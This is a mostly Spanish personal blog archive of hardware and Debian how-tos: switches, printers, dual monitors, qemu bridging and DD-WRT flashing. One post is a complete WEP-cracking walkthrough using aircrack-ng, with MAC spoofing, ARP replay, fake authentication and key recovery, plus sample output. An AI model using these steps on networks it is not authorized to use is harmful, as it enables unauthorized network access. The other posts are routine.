Archive for the ‘hardware’ Category

Juniper Networks EX Ethernet switches

The EX series Ethernet Switch  from Juniper Networks certainly  is not the “cheaper” solution, but is a high level solution for the enterprise.

This post is dedicated to review the EX Series Ethernet switch portfolio from Juniper Networs.

Specifically, the series EX2200, EX3200, EX4200 and EX8200.

The EX2200 ethernet switch:

EX2200

EX 2200 Ethernet Switch

Single rack unit (1 RU) with 24 or 48 x 1Gbps ports.

Aditional has a 4 x 1Gbps fixed ports to connect to agregation layer.

It’ available with or without 802.3af (PoE), ideally for IP phones, wireless Access Points, and IPCCTV cameras.

Ideal for access layer, in branch office or medium enterprise.

And of course, runs the same JUNOS operating system (with some extension for switches).

The EX3200 ethernet switch:

EX3200

EX 3200 Ethernet Switch

Single rack unit with 24 or 48 x 1Gbps ports. Partial (8) or totally support for 802.3af (PoE) in ports.

Two optional modules with pluggable ports; 4 ports x 1 Gbps or 2 ports x 10Gbps.

Another feature is the little display, that shows the status of the switch, enviromental factors, the ports, etc.

Run Junos.

The EX4200 ethernet switch:

EX 4200

EX 4200 Ethernet Switch

Designed for access or aggregation layer, offers 24 or 48 x 1Gbps ports. Full or partial PoE ports.

Two optional modules with pluggable ports; 4 ports x 1 Gbps or 2 ports x 10Gbps.

Also has the display.

The big feature on this switch it’s called “Juniper’s Virtual Chassis Technology”. That’s, connect up to 10 switches with a 128Gbps backplane, to create a single logical device up to 480 x 1Gbps user ports, and 20 x 10Gbps  uplink ports.

The EX8200 ethernet switch:

EX 8200

EX 8200 Ethernet Switch

Its designed for high density 10Gbps networks like, campus agreggation, data centers an core.

Two options are available, a 16 rack units (16 RU) with 8 slots, and 21 racks units (21 RU) with 16 slots.

Have a “built-in migration path” to support (in the future) 100Gbps.

Support “Virtual Chassis” up two switches, and, runs Junos.

Well, these are the Juniper’s Networks switchs that i want in my rack 😉

El de hasta arriba deme, el dinero no es problema!

Esas fueron las palabras del director de tecnología de yo.com, cuando se dispuso a realizar la compra para el área operativa.

Fue difícil, muchos meses de espera, fondos denegados, sufrimiento, dolor …

…pero al final se consiguio. 😀

Un monitor de 18.5 pulgadas para monitorear los logs del corral de servidores de yo.com.

monitor en caja

monitor en caja

Parecian quincianieras abriendo los regalos.

monitor en piezas

monitor en piezas

Hubieron ciertas discrepancias entre el personal de yo.com, ya que algunos disgustan de los monitores que presumen de ser brillantes, y prefieren los colores opacos en las carcasas. recuerden es un ambiente de combate.

Al final la foto quedo asi:

monitor in situm

monitor in situm

Gracias Senior director del Area de Tecnologia de yo.com.

Esperamos que pronto vuelva a decir:

“El de hasta arriba deme, el dinero no es problema!”.

Servidores en yo.com

Saludos lectores 🙂

A petición del gran amigo matus y el gran amigo douglas (Desarrolladores de alto rendimiento que trabajan bajo una bien configurada 😉 plataforma de Trac/SVN, los cuales cierran tickets y realizan commits a diario).

Os presento el inventario de servidores de yo.com (son solo 2):

1. Ringo:

ringo

ringo

Ringo: Procesador AMD K6 – 2 @ 345 poderosos Mhz, con el logo de windows 98 tallado en la parte superior :(, 64MB de RAM, disco duro Seagate de 4GB, fuente de poder sin carcasa, y un embidiable gabinete de PVC de 1/2” a 250 PSIs.

2. Tarot:

tarot

tarot

Tarot: AMD sempron 2600 (1.8 Ghz), 640 MB RAM, 3 discos duros 72,38 y 4 GBs respectivamente, Grabador de DVDs LG, y gabinete pintado a la medida, color negro.

Debido a la falta de personal en el departamento de TI en yo.com, el servidor ringo esta fuera de servicio temporalmente, lamentamos lo inconvenientes, pero estaremos de vuelta a la brevedad de lo posible.

Thinkpad T30 + LCD 19” + xrandr = :D

Saludos.

Por aquí de nuevo, molestando a los lectores.

Resulta que en el campo de algodón (algunos lo llaman trabajo), dispongo, mientras estoy ahi, de  un monitor de marca (no la recuerdo) de 19 pulgadas.  Anda bien por los 1440×900.

Personalmente tengo una modesta Thinkpad T30 (gracias a la caridad).

tiene salida VGA y S-Video.

Resulta que se puede conectar el monitor LCD de 19”, a la salida VGA de la laptop, y configurar Xorg, de tal manera que fucione ambas pantallas LCD (laptop + monitor) en una sola.

El articulo Original esta http://www.thinkwiki.org/wiki/Xorg_RandR_1.2

Lo que yo hice fue lo siguiente:

Configure Xorg (/etc/X11/xorg.conf), en la seccion “Screen” agregue una SubSection “Display”.

——————————————————————————————-

Section “Screen”
Identifier    “Default Screen”
Monitor        “Configured Monitor”
SubSection “Display”
Depth        24
Modes        “1600×1200” “1280×1024” “1024×768” “800×600” “640×480”
# Agregamos el tamanio sumarizado del display
Virtual              2464 1074
EndSubSection

EndSection

——————————————————————————————————-

Luego reinicio las X, e inicio como normalmente lo hago.

Con ambos monitores proyectando lo mismo, abro una consola y tipeo:

$ xrandr –output LVDS  –mode 1024×768 –pos 0x295 –output VGA-0 –mode 1440×900 –pos 1024×0

y ya, funciono!

Encontrar este comando tiene su trabajo, depende de la disposicion de los monitores y de como se quiere tener el display. La verdad me costo un rato encontrarlo (a prueba y error). pero funciona.

En casa, (me prestaron uno para la foto), utilizo el siguiente comando:

$ xrandr –output LVDS –mode 1024×768 –pos 1024×0 –output VGA-0 –mode 1024×768 –pos 0x0

Dual monitor en casa

Dual monitor en casa

P.D.: Para aquellos que pensaron que el libro de Calculo no les serviria nuevamente 😉

Canon pixma iP1900 en debian GNU/Linux.

Canon iP1900

Canon iP1900

Saludos gentes.

Como consecuencia de contenido academico impreso, surge la necesidad de un aparato moderno que manche papel.

Fin de mes, logro hacer que llegue a mis manos una Canon pixma iP1900, previa investigacion documental en algo llamado INTERNET, me doy cuenta que es compatible con GNU/Linux.

Manos al teclado.

Descargar los drivers oficiales de canon.

http://software.canon-europe.com/products/0010647.asp

Desempaquetar e Instalar los paquetes *.deb

taro@blackbull# tar xvf iP1900_debian_printer.tar
taro@blackbull# mkdir ip1900
taro@blackbull# mv cnijfilter* ip1900/
taro@blackbull# cd ip1900/
taro@blackbull# dpkg -i *.deb
taro@blackbull# apt-get install cupsys cupsys-common cupsys-client cupsys-bsd

Agregar Impresora en CUPS.

http://localhost:631/admin

Aniadir Impresora:
Nombre: pixmita
Ubicacion: Mi Cuarto, en el suelo.
descripcion: Cartuchos Canon 40 y 41

Conexion: Canon iP1900 series USB #  1 (Canon iP1900 series)

Modelo: Canon iP1900 series Ver.3.00 (en)

Eso es todo, la impresora se aniado correctamente.

A imprimir !

Yet Another WEP Crack HOWTO!

wireless APs

Redes wireless, que seriamos sin ellas ?

Voy a explicar como descifrar claves WEP utilizando una tarjeta PCMCIA y debian GNU/Linux.

Nota: Esto es con propositos educativos solamente, no me hago responsable por el mal uso que usted haga (me refiero a utilizar redes inalambricas sin permiso).

Instalamos Aircrack-ng y macchanger

#apt-get update

# apt-get install aircrack-ng macchanger

# ifconfig wlan0 down

# macchanger  -m 00:03:66:66:66:66 wlan0

# ifconfig wlan0 up

Buscamos las redes candidatas.

# iwlist wlan0 scan

Anotamos por ahi, en algun editor: La SSID, la direccion MAC del Punto de Acceso y el canal.

Supongamos que estos son los datos:

SSID: ‘mired’

MAC del AP: 00:00:01:11:11:11

canal: 6

Iniciamos la tarjeta en modo monitor con Airmon-ng. (en canal 6, para este caso).

# airmon-ng start wlan0 6

Esto creara una interfaz mon0

Consola # 1: Capturamos paquetes con Airodump-ng (dejamos esta consola trabajando).

# airodump-ng –ivs -w red_de_prueba –channel 6 mon0

Consola # 2: Iniciaremos reinyeccion de paquetes ARP con Airreplay-ng.(dejamos esta consola trabajando).

# aireplay-ng –arpreplay -x 200  -e mired -b 00:00:01:11:11:11 mon0

Si el ataque funciona se debe obtener un resultado similar a este.
Read 182009 packets (got 87151 ARP requests and 60303 ACKs), sent 60299 packets.

Consola # 3: Iniciamos ataque de autenticacion falsa. (dejamos esta consola trabajando).

# aireplay-ng –fakeauth -x 200 -e mired -b 00:00:01:11:11:11 mon0

Si el ataque funciona, se debe obtener un resultado similar a este.
13:18:14  Sending Authentication Request (Open System) [ACK]
13:18:14  Authentication successful
13:18:14  Sending Association Request [ACK]
13:18:14  Association successful 🙂 (AID: 1)

Consola # 4: Comenzamos un ataque de cracking sobre los IVs, cuando en la columna
“#Data” de la Consola # 1, hayan por lo menos 5,000 IVs validos, si no funciona, 50,000 IVs, sino 100,000 ; 250,000; 500,000; 1,000,000; 3,500,000. etc.

# aircrack-ng red_de_prueba*.ivs

Se debe obtener un resultado similar a este.

Opening red_de_prueba-01.ivs
Read 61053 packets.

#  BSSID              ESSID                     Encryption

1  00:00:01:11:11:11  mired              WEP (61049 IVs)

Index number of target network ? 1

Opening red_de_prueba-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 61049 ivs.
KEY FOUND! [ AB:CD:EF:12:34 ]
Decrypted correctly: 100%

En este punto se ha encontrado la clave WEP.

Configuramos la tarjeta con la clave WEP.

# iwconfig wlan0 down
# iwconfig wlan0 up
# iwconfig wlan0 essid ‘mired’ key ABCDEF1234

# dhclient wlan0

En este punto, ya estamos conectados con el AP.

Wireless WPA-PSK PEAP MSCHAPv2

El problema:

taro@blackbull# iwlist wlan0 scan

Existe una red WPA-PSK, para uso libre de los estudiantes de la Universidad.

Por un documento de instrucciones para dummies en windowsXP y Vista. Me doy cuenta que utilizan PEAP con MSCHAPv2 sin certificado, con la misma cuenta del correo. de la universidad de cada estudiante.

Despues de investigar un poco.

Solucion: Utilizar wpasupplicant

taro@blackbull# apt-get install wpasupplicant

taro@blackbull# man 5 wpa_supplicant.conf

El fichero (/etc/wpa_supplicant.conf)  me quedo asi:

——————————————————————————
ctrl_interface=/var/run/wpa_supplicant
network={
ssid=”universidad-red”
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity=”miusuariodecorreo”
password=”micontraseniadecorreo”
phase1=”peaplabel=0″
phase2=”auth=MSCHAPV2″

}
———————————————————————————–

ahora

taro@blackbull# wpa_supplicant -Dwext -iwlan0 -c /etc/wpa_supplicant.conf

taro@blackbull# dhclient wlan0

Funciono 😉

qemu + debian gnu/linux + tun/tap + puente de red

El problema:
Necesito configurar un servidor sin entorno grafico ni nada de eso. Pero solo tengo una maquina, y necesito navegar, oir mp3s, chat, etc. mientras configuro el servidor.
La solucion:
Instalar el servidor (debian gnu/linux) en otra particion, y levantarla con qemu desde el sistema operativo que uso (mp3s, web, chat, etc.).
Y para comunicarme entre ambos sitemas operativos, poner una ip a cada uno de ellos y configurarla.
Por aqui encontre un buen tutorial sobre ello.
Al final, hice lo siguiente:

1. Instalar qemu.
# apt-get install qemu

2. Instalar bridge utils.
# apt-get install bridge-utils

3. Configurar el archivo /etc/qemu-ifup en la maquina ANFITRION.
#!/bin/sh
/sbin/ifconfig $1 192.168.5.9;
/usr/sbin/brctl addif br0 $1;
sleep 2

4. Configurar el archivo /etc/network/interfaces maquina ANFITRION.
auto lo
iface lo inet loopback
auto br0
iface br0 inet static
address 192.168.5.9
network 192.168.5.0
netmask 255.255.255.0
broadcast 192.168.5.255
gateway 192.168.5.1
bridge_ports eth0
bridge_fd 9
bridge_hello 2
bridge_maxage 12
bridge_stp off

5. Arrancamos la maquina HUESPED.
# qemu -net nic,vlan0 -net tap,vlan=0,ifname=tap0,script=/etc/qemu-ifup /dev/hda

6. Configuramos la “trajeta de red” de la maquina HUESPED.
# ifconfig eth1 192.168.5.4 netmask 255.255.255.0
# route add default gateway 192.168.5.1

Configurando una RICOH AFICIO AP410N en debian

En el trabajo, compraron una Ricoh Aficio AP410N, es muy eficiente y esta conectada via ethernet.ricoh AP410N
Para configurarla en debian es algo sencillo -pero me costo un poco-.
Primero que nada bajamos el driver:
Ricoh-Aficio_AP410N_PS.ppd
y lo copiamos en /usr/share/cups/drivers/

Instalamos CUPS:

# apt-get install cupsys cupsys-common cupsys-client cupsys-bsd
Abrimos el navegador en http://localhost:631/admin
y agregamos una nueva impresora. En tipo de conexión le ponemos Internet Printing Protocol (ipp)
y en URI de conexion ponemos: http://ip-de-la-impresora:631/ipp/
mandan pagina de prueba y …
wala.
y eso es todo…

Actualizando a DD-WRT un router Linksys WRT54G V8

Algo muy importante: Para actualizar el firmware se debe estar conectado al router por medio de un cable ethernet, nunca via wireless.
El firmware (dd-wrt) para el router Linksys WRT54G V8 se descarga de aqui.
http://rapidshare.com/files/78681047/dd-wrt.v24_micro_wrt54gv8.bin.html
el vxworkskiller se descarga desde el foro oficial de DD-WRT.
http://www.dd-wrt.com/phpBB2/viewtopic.php?t=20095&postdays=0&postorder=asc&start=0
wrt54g-v81 Configuramos manualmente nuestra tarjeta de red con la ip 192.168.1.100 mascara de subred 255.255.255.0 y puerta de enlace 192.168.1.1
# ifconfig eth0 192.168.1.1 netmask 255.255.255.0
# route add default gateway 192.168.1.1
Mantenemos presionado el boton RESET del router durante 30 segundos.
Abrimos nuestro navegador WEB, accesamos al router, y nos vamos a la pagina de actualizar firmware. Desde ahi cargamos el archivo vxworkskillerv8.bin y actualizamos. Esto desde el firmaware original de Linksys.
Despues de ver el mensaje que nos indica que la actualizacion termino con exito, desconectamos el router de la corriente electrica, esperamos 5 segundos y lo volvemos a conectar.
Presionamos el boton RESET nuevamente durante 30 segundos.
Esperamos 30 segundos mas y desconectamos el router de la corriente electrica.
Manteniendo presionado el boton RESET conectamos el router a la corriente electrica, esperamos 5 segundos, y soltamos el boton.
Ahora colocamos el nuevo firmware en el router mediante TFTP.
# tftp 192.168.1.1; mode octet;put dd-wrt.v24_micro_wrt54gv8.bin
Luego esperamos algo asi como 10 minutos.
Pues eso es todo, la ip del router sigue siendo 192.168.1.1, el usuario es root y la contrasenia es admin